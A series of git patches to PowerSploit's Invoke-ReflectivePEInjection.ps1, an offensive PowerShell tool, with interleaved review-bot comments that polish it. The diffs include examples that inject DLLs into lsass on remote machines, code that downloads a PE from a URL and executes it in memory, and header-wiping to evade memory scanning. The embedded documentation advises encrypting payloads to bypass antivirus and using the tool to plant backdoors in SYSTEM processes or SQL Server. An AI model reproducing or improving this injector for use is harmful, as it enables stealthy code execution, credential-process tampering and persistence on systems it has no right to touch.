From 17bfa4e2762e4c8c819b36503faca2c99ae816f3 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Fri, 6 Nov 2015 13:31:58 -0500 Subject: Fixed a casting bug --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 4ca1b9d..b176d8a 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -2381,7 +2381,7 @@ $RemoteScriptBlock = { $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false @@ -2440,7 +2440,7 @@ $RemoteScriptBlock = { #ASLR check [IntPtr]$LoadAddr = [IntPtr]::Zero - $PESupportsASLR = ($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE + $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE if ((-not $ForceASLR) -and (-not $PESupportsASLR)) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue -- cgit v1.2.3 From 0eb520e31f97bc0ca83bd2c1546a18dd97e09d79 Mon Sep 17 00:00:00 2001 
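Review bot: The `[Int]` cast is applied at each consumer of `$PEInfo.DllCharacteristics` (the NX_COMPAT test in this hunk and the DYNAMIC_BASE test in the next one), so any further `-band` against that field will hit the same bug unless its author remembers the cast. Converting once where $PEInfo is assembled — Get-PEBasicInfo, which is outside this hunk — would fix it at the source. The commit message says only "casting bug"; a one-line comment at the cast, such as `# DllCharacteristics is read as a 16-bit value; widen to Int so -band against the Int32 constants compares cleanly`, would tell the next reader why the cast exists (the 16-bit type is presumed from the PE header layout, not shown in the hunk). $RemoteScriptBlock begins outside the hunk.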
From: Matt Graeber Date: Sat, 7 Nov 2015 20:25:29 -0500 Subject: Removed extraneous parameters Removed the following extraneous parameters: -PEPath -PEUrl -ComputerName The functionality they provided can be easily replicated in code outside of Invoke-ReflectivePEInjection. i.e. it should be up to the user how they might want to download a PE before loading it. That should not be dictated by Invoke-ReflectivePEInjection. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 107 +++++-------------------- 1 file changed, 18 insertions(+), 89 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b176d8a..238b9f6 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -7,14 +7,9 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. - 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. -This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, -this will load and execute the DLL/EXE in to memory without writing any files to disk. - - 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. 
@@ -22,39 +17,21 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. - -While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array -containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will -bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba -blog linked below (thanks to whitey). - PowerSploit Function: Invoke-ReflectivePEInjection -Author: Joe Bialek, Twitter: @JosephBialek +Original author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. -.PARAMETER PEPath - -The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. - -.PARAMETER PEUrl - -A URL containing a DLL/EXE to load and execute. - .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. -.PARAMETER ComputerName - -Optional, an array of computernames to run the script on. - .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void 
@@ -78,43 +55,30 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. - -.EXAMPLE - -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - -Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local .EXAMPLE -Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print - the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) +Load DemoDLL and run the exported function WStringFunc, print the wchar_t* returned by WStringFunc(). +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL.dll') +$Result = Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString +Write-Output $Result .EXAMPLE Load DemoEXE and run it locally. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE -Load DemoEXE and run it locally. Forces ASLR on for the EXE. 
-Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local - -.EXAMPLE - -Load a PE from a byte array. -Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEPath $PEBytes -ProcName lsass .NOTES GENERAL NOTES: @@ -134,8 +98,6 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. - - DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. 
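Review bot: The last example in this hunk still binds the byte array to `-PEPath`, `Invoke-ReflectivePEInjection -PEPath $PEBytes -ProcName lsass`, although this same commit removes that parameter, so the example fails at parameter binding; it should read `Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass`. Its description line, "in to the lsass process on a remote computer", is also stale now that -ComputerName is removed by the same commit. The other examples in the hunk were converted consistently.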
@@ -182,50 +144,36 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding(DefaultParameterSetName="WebFile")] +[CmdletBinding()] Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $PEPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $PEUrl, - - [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, [Parameter(Position = 1)] - [String[]] - $ComputerName, - - [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] [String] $FuncReturnType = 'Void', - [Parameter(Position = 3)] + [Parameter(Position = 2)] [String] $ExeArgs, - [Parameter(Position = 4)] + [Parameter(Position = 3)] [Int32] $ProcId, - [Parameter(Position = 5)] + [Parameter(Position = 4)] [String] $ProcName, - [Parameter(Position = 6)] [Switch] $ForceASLR ) Set-StrictMode -Version 2 - $RemoteScriptBlock = { [CmdletBinding()] Param( @@ -2900,18 +2848,6 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $PEPath -ErrorAction Stop | Out-Null - [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) - } - elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) - } - #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' 
@@ -2935,14 +2871,7 @@ Function Main $ExeArgs = "ReflectiveExe" } - if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) - } - else - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName - } + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) } Main -- cgit v1.2.3 From b8e831e4f9650169371fafc24352b8cdd7e65932 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 19:50:05 -0800 Subject: Revert "Removed extraneous parameters" This reverts commit 0eb520e31f97bc0ca83bd2c1546a18dd97e09d79. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 107 ++++++++++++++++++++----- 1 file changed, 89 insertions(+), 18 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 238b9f6..b176d8a 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 
@@ -7,9 +7,14 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. + 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. +This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, +this will load and execute the DLL/EXE in to memory without writing any files to disk. + + 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. 
@@ -17,21 +22,39 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. + +While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array +containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will +bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba +blog linked below (thanks to whitey). + PowerSploit Function: Invoke-ReflectivePEInjection -Original author: Joe Bialek, Twitter: @JosephBialek -Code review and modifications: Matt Graeber, Twitter: @mattifestation +Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None +Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. +.PARAMETER PEPath + +The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. + +.PARAMETER PEUrl + +A URL containing a DLL/EXE to load and execute. + .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. +.PARAMETER ComputerName + +Optional, an array of computernames to run the script on. + .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void 
@@ -55,30 +78,43 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. + +.EXAMPLE + +Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). +Note that the file name on the website can be any file extension. +Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString + +.EXAMPLE + +Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local .EXAMPLE -Load DemoDLL and run the exported function WStringFunc, print the wchar_t* returned by WStringFunc(). -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL.dll') -$Result = Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -Write-Output $Result +Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print + the wchar_t* returned by WStringFunc() from all the computers. +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') -Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" +Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') -Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +Load DemoEXE and run it locally. Forces ASLR on for the EXE. 
+Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL_RemoteProcess.dll') -Invoke-ReflectivePEInjection -PEPath $PEBytes -ProcName lsass +Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local + +.EXAMPLE + +Load a PE from a byte array. +Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" .NOTES GENERAL NOTES: @@ -98,6 +134,8 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. + + DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. 
@@ -144,36 +182,50 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding()] +[CmdletBinding(DefaultParameterSetName="WebFile")] Param( - [Parameter(Position = 0, Mandatory = $true)] + [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] + [String] + $PEPath, + + [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] + [Uri] + $PEUrl, + + [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, [Parameter(Position = 1)] + [String[]] + $ComputerName, + + [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] [String] $FuncReturnType = 'Void', - [Parameter(Position = 2)] + [Parameter(Position = 3)] [String] $ExeArgs, - [Parameter(Position = 3)] + [Parameter(Position = 4)] [Int32] $ProcId, - [Parameter(Position = 4)] + [Parameter(Position = 5)] [String] $ProcName, + [Parameter(Position = 6)] [Switch] $ForceASLR ) Set-StrictMode -Version 2 + $RemoteScriptBlock = { [CmdletBinding()] Param( @@ -2848,6 +2900,18 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" + if ($PsCmdlet.ParameterSetName -ieq "LocalFile") + { + Get-ChildItem $PEPath -ErrorAction Stop | Out-Null + [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) + } + elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") + { + $WebClient = New-Object System.Net.WebClient + + [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) + } + #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' 
@@ -2871,7 +2935,14 @@ Function Main $ExeArgs = "ReflectiveExe" } - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) + if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) + } + else + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName + } } Main -- cgit v1.2.3 From 992f9800229d58158a4094f8ab4a92e0473fef34 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 20:00:22 -0800 Subject: Removed extraneous parameters Removed extraneous parameters Removed the following extraneous parameters: -PEPath -PEUrl The functionality they provided can be easily replicated in code outside of Invoke-ReflectivePEInjection. i.e. it should be up to the user how they might want to download a PE before loading it. That should not be dictated by Invoke-ReflectivePEInjection. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 71 +++++--------------------- 1 file changed, 13 insertions(+), 58 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b176d8a..503ea7f 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 
@@ -7,14 +7,12 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. - 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk. - 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. 
@@ -22,31 +20,17 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. - -While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array -containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will -bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba -blog linked below (thanks to whitey). - PowerSploit Function: Invoke-ReflectivePEInjection Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. -.PARAMETER PEPath - -The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. - -.PARAMETER PEUrl - -A URL containing a DLL/EXE to load and execute. - .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. 
@@ -81,40 +65,34 @@ Optional, will force the use of ASLR on the PE being loaded even if the PE indic .EXAMPLE -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local .EXAMPLE Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE Load DemoEXE and run it locally. Forces ASLR on for the EXE. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. 
-Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local - -.EXAMPLE - -Load a PE from a byte array. -Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local .NOTES GENERAL NOTES: @@ -134,8 +112,6 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. - - DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. @@ -182,17 +158,9 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding(DefaultParameterSetName="WebFile")] +[CmdletBinding()] Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $PEPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $PEUrl, - - [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, @@ -218,7 +186,6 @@ Param( [String] $ProcName, - [Parameter(Position = 6)] [Switch] $ForceASLR ) 
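Review bot: All five rewritten examples call `[IO.File]::ReadAllBytes('DemoDLL.dll')` with a relative path, but .NET resolves relative paths against the process working directory ([Environment]::CurrentDirectory), not PowerShell's current location, so the examples throw FileNotFoundException whenever the two differ — the usual state after Set-Location. Use an absolute path or resolve through PowerShell first: `$PEBytes = [IO.File]::ReadAllBytes((Resolve-Path 'DemoDLL.dll').Path)`. The same applies to the DemoEXE.exe and DemoDLL_RemoteProcess.dll examples in this hunk.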
@@ -2900,18 +2867,6 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $PEPath -ErrorAction Stop | Out-Null - [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) - } - elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) - } - #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' -- cgit v1.2.3 From aae81ddfe554abb75c9dd9f1bab5474cfe41c6e7 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 20:26:08 -0800 Subject: Adding -DoNotZeroMZ for testing --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 503ea7f..8f4533e 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -62,6 +62,10 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. + +.PARAMETER DoNotZeroMZ + +Optional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once. .EXAMPLE @@ -187,7 +191,10 @@ Param( $ProcName, [Switch] - $ForceASLR + $ForceASLR, + + [Switch] + $DoNotZeroMZ ) Set-StrictMode -Version 2 
@@ -2875,10 +2882,12 @@ Function Main
 throw 'PE is not a valid PE file.'
 }
 
- # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg
- # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.
- $PEBytes[0] = 0
- $PEBytes[1] = 0
+ if (-not $DoNotZeroMZ) {
+ # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg
+ # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.
+ $PEBytes[0] = 0
+ $PEBytes[1] = 0
+ }
 
 #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)
 if ($ExeArgs -ne $null -and $ExeArgs -ne '')
-- cgit v1.2.3
From ce3b21685ad74e302cefb39c07bfba9e0e178d9b Mon Sep 17 00:00:00 2001
From: Matt Graeber
Date: Mon, 14 Dec 2015 16:40:04 -0800
Subject: Bugfix #92: perform OS check when importing NtCreateThreadEx
---
 CodeExecution/Invoke-ReflectivePEInjection.ps1 | 11 +++++++----
 Exfiltration/Invoke-Mimikatz.ps1 | 11 +++++++----
 2 files changed, 14 insertions(+), 8 deletions(-)
(limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1')
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1
index 8f4533e..d164493 100644
--- a/CodeExecution/Invoke-ReflectivePEInjection.ps1
+++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1
